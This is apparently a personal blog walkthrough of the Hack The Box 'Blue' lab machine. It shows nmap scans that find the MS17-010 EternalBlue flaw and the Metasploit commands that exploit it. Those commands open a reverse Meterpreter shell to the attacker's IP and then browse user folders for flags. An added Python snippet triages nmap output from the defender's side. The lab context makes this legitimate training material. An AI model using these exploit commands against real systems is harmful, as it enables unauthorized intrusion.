Hack The Box (HTB) Blue -Walkthrough-

yu1ch1
Sep 5, 2020

Hey guys! Today I’m going to write a walkthrough for Hack The Box.

The targeted machine is Blue.

Blue’s Info Card

When I saw the words “Blue” and “Windows”, it rang a bell.
Let’s proceed for the time being.

01-nmap

Run nmap to scan the machine.

#nmap -sV -sS -Pn -oN blueHTB blue.htb
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.16s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7–10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

It helps to add the target to /etc/hosts in advance.

#vi /etc/hosts
10.10.10.40 blue.htb

The scan results show that ports 139 and 445 are open. Investigate further for vulnerabilities.

#nmap --script vuln blue.htb 
part of the result

smb-vuln-ms17-010 is VULNERABLE.
The vulnerability is commonly known as “Eternal Blue”, which is why this machine is named Blue.
Eternal Blue became famous in 2017 when it was used by a ransomware called “WannaCry”.
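
A defender-side way to triage scan output like the one above, as an added example that is not part of the original post: it parses nmap's normal-format report, lists which hosts expose SMB on 139/445, and flags those where smb-vuln-ms17-010 reports VULNERABLE. The sample report, the two *.example hosts and the action labels are constructed for illustration.

```python
import re

# Constructed sample in nmap's normal (-oN) output format; the two
# *.example hosts and all script results below are illustrative only.
SAMPLE_REPORT = """\
Nmap scan report for blue.htb (10.10.10.40)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for patched.example (192.0.2.10)
PORT    STATE SERVICE
80/tcp  open  http
445/tcp open  microsoft-ds

Nmap scan report for web.example (192.0.2.20)
PORT    STATE    SERVICE
80/tcp  open     http
445/tcp filtered microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
OPEN_RE = re.compile(r"^(\d+)/tcp\s+open\s", re.M)
# Script header plus the indented "|   ..." / "|_   ..." lines under it.
SCRIPT_RE = re.compile(r"^\| smb-vuln-ms17-010:.*\n((?:\|[ _] .*\n?)*)", re.M)
SMB_PORTS = {139, 445}

def triage(report):
    """Return one finding per scanned host, in report order."""
    findings = []
    hosts = list(HOST_RE.finditer(report))
    for i, m in enumerate(hosts):
        end = hosts[i + 1].start() if i + 1 < len(hosts) else len(report)
        block = report[m.end():end]
        smb = sorted({int(p) for p in OPEN_RE.findall(block)} & SMB_PORTS)
        script = SCRIPT_RE.search(block)
        vuln = bool(script and re.search(r"State:\s*VULNERABLE\b", script.group(1)))
        # Hypothetical labels: confirmed finding > exposed SMB > nothing to do.
        action = "patch-now" if vuln else "review-exposure" if smb else "ok"
        findings.append({"host": m.group(1), "smb_ports": smb,
                         "ms17_010": vuln, "action": action})
    return findings
```

Hosts that come back as "review-exposure" have SMB reachable but no confirmed finding, so they still need a check that the MS17-010 patch is installed and that 139/445 are not exposed more widely than necessary.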

02-msf

Attack the discovered vulnerability.

# msfconsole
msf5 > search ms17-010
parts of the result
msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts blue.htb
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.41
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

The Meterpreter shell has started.
I didn’t understand how to use Meterpreter, so I had a hard time.
I referred to this page.

meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../..
meterpreter > cd Users
meterpreter > dir

I found an administrator.
The flag was on each user’s desktop.

Thank you for reading.
